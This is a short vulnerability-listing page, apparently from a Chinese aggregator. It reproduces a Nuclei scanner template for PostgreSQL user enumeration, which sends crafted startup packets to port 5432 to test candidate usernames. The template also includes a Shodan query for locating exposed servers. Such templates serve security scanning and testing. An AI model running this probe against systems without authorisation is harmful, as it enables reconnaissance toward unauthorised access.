psql-user-enum: PostgreSQL - User Enumeration

日期: 2025-08-01 | 影响软件: PostgreSQL | POC: 已公开

漏洞描述

PSQL user enumeration.

PoC代码[已公开]

id: psql-user-enum

info:
  name: PostgreSQL - User Enumeration
  author: pussycat0x
  severity: low
  description: |
    PSQL user enumeration.
  reference:
    - https://medium.com/@netscylla/pentesters-guide-to-postgresql-hacking-59895f4f007
  metadata:
    verified: "true"
    max-request: 1
    shodan-query: port:5432 product:"PostgreSQL"
  tags: network,postgresql,db,unauth,enum,psql,tcp,discovery
tcp:
  - inputs:
      - data: "{{hex_encode('\u0000\u0000\u0000{{str}}\u0000\u0003\u0000\u0000user\u0000{{users}}\u0000database\u0000{{users}}\u0000application_name\u0000psql\u0000client_encoding\u0000UTF8\u0000\u0000')}}"
        type: hex

    host:
      - "{{Hostname}}"
    port: 5432

    attack: clusterbomb
    payloads:
      users:
        - postgres
        - tst
      str:
        - J
        - T
        - R

    matchers:
      - type: word
        part: raw
        words:
          - "client_encoding"
          - "integer_datetimes"
        condition: and
# digest: 4b0a00483046022100e7dcf6814f6c65247d08d3c673be3f730704a49151531d2dad9dbeaebc79f670022100be569782cac0df23e88332f0f4a6070897bb2e822ddd56a6ccc59a24d499e083:922c64590222798bb761d5b6d8e72950

来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/network/enumeration/psql-user-enum.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐